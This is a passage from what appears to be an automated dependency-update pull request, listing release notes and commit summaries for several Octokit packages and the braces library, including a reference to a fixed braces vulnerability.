(2025-10-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003eba56fbc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.1...v13.2.0\"\u003e13.2.0\u003c/a\u003e (2025-09-29)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew Projects v2 endpoints, new code scanning dismissal endpoints, many other endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/690\"\u003e#690\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e0e236cb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.0...v13.1.1\"\u003e13.1.1\u003c/a\u003e (2025-06-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e8e5da25\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.1...v13.1.0\"\u003e13.1.0\u003c/a\u003e (2025-06-16)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and \u003ccode\u003ecompareCommitsWithBasehead\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/678\"\u003e#678\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e6d8ea8a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2025-05-25)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e\u003ccode\u003e413e899\u003c/code\u003e\u003c/a\u003e feat: add immutable releases, enterprise team membership, enterprise team org...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/3d311d679e3d3ebaf073a66c5ce8a0603bf47d52\"\u003e\u003ccode\u003e3d311d6\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003e\u003ccode\u003eba56fbc\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/80745be518d862ab9a304ffb7793be4ebc3de0ce\"\u003e\u003ccode\u003e80745be\u003c/code\u003e\u003c/a\u003e ci(action): update actions/checkout action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/687\"\u003e#687\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e\u003ccode\u003e0e236cb\u003c/code\u003e\u003c/a\u003e feat: new Projects v2 endpoints, new code scanning dismissal endpoints, many ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/bf19e3ed5f5e833712d2663984c4ce456696e93e\"\u003e\u003ccode\u003ebf19e3e\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.6.2 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/4f9fc562b1dda9d8f724e8ffee444141c2f45673\"\u003e\u003ccode\u003e4f9fc56\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/688\"\u003e#688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e\u003ccode\u003e8e5da25\u003c/code\u003e\u003c/a\u003e fix: handle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e\u003ccode\u003e6d8ea8a\u003c/code\u003e\u003c/a\u003e feat: add paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and `compareCommitsWith...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8ec2713699ee473ee630be5c8a66b9665bcd4173\"\u003e\u003ccode\u003e8ec2713\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e - no new paginated endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/680\"\u003e#680\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v2.21.3...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 5.6.3 to 10.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev10.0.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.7...v10.0.8\"\u003e10.0.8\u003c/a\u003e (2026-02-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to properly support int64's (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/798\"\u003e#798\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003ef13f5d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.6...v10.0.7\"\u003e10.0.7\u003c/a\u003e (2025-11-13)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereadme:\u003c/strong\u003e properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003ef17c1c1\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/785\"\u003e#785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.5...v10.0.6\"\u003e10.0.6\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e1aeac56\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.4...v10.0.5\"\u003e10.0.5\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update octokit deps (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/772\"\u003e#772\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/30f83b64578eebf6988b44df495d235de8136e6e\"\u003e30f83b6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.3...v10.0.4\"\u003e10.0.4\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/775\"\u003e#775\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/ad78b4c8099a790d9ac3489342021896cabdbecd\"\u003ead78b4c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.2...v10.0.3\"\u003e10.0.3\u003c/a\u003e (2025-06-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e unreplaced version number in \u003ccode\u003edist-bundle/\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/765\"\u003e#765\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/5b181af867a6b3ccfd23800d876ff22e1e54fd7d\"\u003e5b181af\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.1...v10.0.2\"\u003e10.0.2\u003c/a\u003e (2025-05-20)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003e\u003ccode\u003ef13f5d9\u003c/code\u003e\u003c/a\u003e fix: use \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to prop...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/9ba6ae0fd2eff35a6c29a9f032eca6e9ba002976\"\u003e\u003ccode\u003e9ba6ae0\u003c/code\u003e\u003c/a\u003e Document that unsuccessful HTTP status code result in an exception (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/795\"\u003e#795\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/7160b8201ee183d57e3572c9ac78aa3f241c9468\"\u003e\u003ccode\u003e7160b82\u003c/code\u003e\u003c/a\u003e chore(deps): replace glob with tinyglobby (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/791\"\u003e#791\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ab8018b6d42de25adb305e3ea5ea840ee2805481\"\u003e\u003ccode\u003eab8018b\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/776\"\u003e#776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/fb916e454df205980835281368da81a003cde30d\"\u003e\u003ccode\u003efb916e4\u003c/code\u003e\u003c/a\u003e build(deps): bump vite from 6.3.4 to 6.4.1 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/780\"\u003e#780\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/e1eb7693969a87cbdde278c82a7474b8acec9207\"\u003e\u003ccode\u003ee1eb769\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.27.0 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/784\"\u003e#784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003e\u003ccode\u003ef17c1c1\u003c/code\u003e\u003c/a\u003e fix(readme): properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ea46fa9cd46f970fad5e286e6fdd2ea46929ac5d\"\u003e\u003ccode\u003eea46fa9\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/778\"\u003e#778\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/8166d281814326b3e11d60b1895e623f2fd51c9e\"\u003e\u003ccode\u003e8166d28\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/781\"\u003e#781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e\u003ccode\u003e1aeac56\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v5.6.3...v10.0.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​octokit/request\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 2.1.0 to 7.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e\u003ccode\u003e@​octokit/request-error\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.2...v7.1.0\"\u003e7.1.0\u003c/a\u003e (2025-11-13)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003einherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e property (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/535\"\u003e#535\u003c/a\u003e/\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/536\"\u003e#536\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e2ea2780\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.1...v7.0.2\"\u003e7.0.2\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003ee5a75ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.0...v7.0.1\"\u003e7.0.1\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/522\"\u003e#522\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/4a453f21afbde9fc19d779518cb8e5f23d05038f\"\u003e4a453f2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.8...v7.0.0\"\u003e7.0.0\u003c/a\u003e (2025-05-20)\u003c/h1\u003e\n\u003ch3\u003eContinuous Integration\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003estop testing against NodeJS v18 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/512\"\u003e#512\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/8eee0c1eff4f247b714da5db9437787507e124df\"\u003e8eee0c1\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eDrop support for NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ebuild: set minimal node version in build script to v20\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eci: stop testing against NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.7...v6.1.8\"\u003e6.1.8\u003c/a\u003e (2025-04-10)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v14 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/505\"\u003e#505\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/ab4ea7b81bd8055060bfafa47b7eb13d89c7e475\"\u003eab4ea7b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e\u003ccode\u003e2ea2780\u003c/code\u003e\u003c/a\u003e feat: inherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/ac7b3094475260d5bc95951d2040e38da8e88dd8\"\u003e\u003ccode\u003eac7b309\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/dadc76ddc454c475f07525a8cd96fc29e4353cb1\"\u003e\u003ccode\u003edadc76d\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/f57f2e6b6fdc3578c3484c8939bcf56548b620eb\"\u003e\u003ccode\u003ef57f2e6\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003e\u003ccode\u003ee5a75ef\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5d5de21540843d46e1dbd15696af8bdff9cf400\"\u003e\u003ccode\u003ee5d5de2\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/8cc127bf725e581cdd32336669d322632e4392b4\"\u003e\u003ccode\u003e8cc127b\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v6 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b3a876bc68c0d044bf52eeaa513760e362d426e8\"\u003e\u003ccode\u003eb3a876b\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/527\"\u003e#527\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/cf1817b2c1bd15ffbf26bbf4390aa07084a10fce\"\u003e\u003ccode\u003ecf1817b\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/61f1e8750fa8c1b7b57f4323ab13b92bb1017cf2\"\u003e\u003ccode\u003e61f1e87\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency tinybench to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/519\"\u003e#519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v2.1.0...v7.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nRemoves `@tootallnate/once`\n\nUpdates `braces` from 3.0.2 to 3.0.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/74b2db2938fad48a2ea54a9c8bf27a37a62c350d\"\u003e\u003ccode\u003e74b2db2\u003c/code\u003e\u003c/a\u003e 3.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/88f1429a0f47e1dd3813de35211fc97ffda27f9e\"\u003e\u003ccode\u003e88f1429\u003c/code\u003e\u003c/a\u003e update eslint. lint, fix unit tests.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/415d660c3002d1ab7e63dbf490c9851da80596ff\"\u003e\u003ccode\u003e415d660\u003c/code\u003e\u003c/a\u003e Snyk js braces 6838727 (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/40\"\u003e#40\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/190510f79db1adf21d92798b0bb6fccc1f72c9d6\"\u003e\u003ccode\u003e190510f\u003c/code\u003e\u003c/a\u003e fix tests, skip 1 test in test/braces.expand\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/716eb9f12d820b145a831ad678618731927e8856\"\u003e\u003ccode\u003e716eb9f\u003c/code\u003e\u003c/a\u003e readme bump\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/a5851e57f45c3431a94d83fc565754bc10f5bbc3\"\u003e\u003ccode\u003ea5851e5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/braces/issues/37\"\u003e#37\u003c/a\u003e from coderaiser/fix/vulnerability\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/2092bd1fb108d2c59bd62e243b70ad98db961538\"\u003e\u003ccode\u003e2092bd1\u003c/code\u003e\u003c/a\u003e feature: braces: add maxSymbols (\u003ca href=\"https://github.com/micromatch/braces/issues/\"\u003ehttps://github.com/micromatch/braces/issues/\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/9f5b4cf47329351bcb64287223ffb6ecc9a5e6d3\"\u003e\u003ccode\u003e9f5b4cf\u003c/code\u003e\u003c/a\u003e fix: vulnerability (\u003ca href=\"https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\"\u003ehttps://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/98414f9f1fabe021736e26836d8306d5de747e0d\"\u003e\u003ccode\u003e98414f9\u003c/code\u003e\u003c/a\u003e remove funding file\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/665ab5d561c017a38ba7aafd92cc6655b91d8c14\"\u003e\u003ccode\u003e665ab5d\u003c/code\u003e\u003c/a\u003e update keepEscaping doc (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/27\"\u003e#27\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micromatch/braces/compare/3.0.2...3.0.3\"\u003ecompare 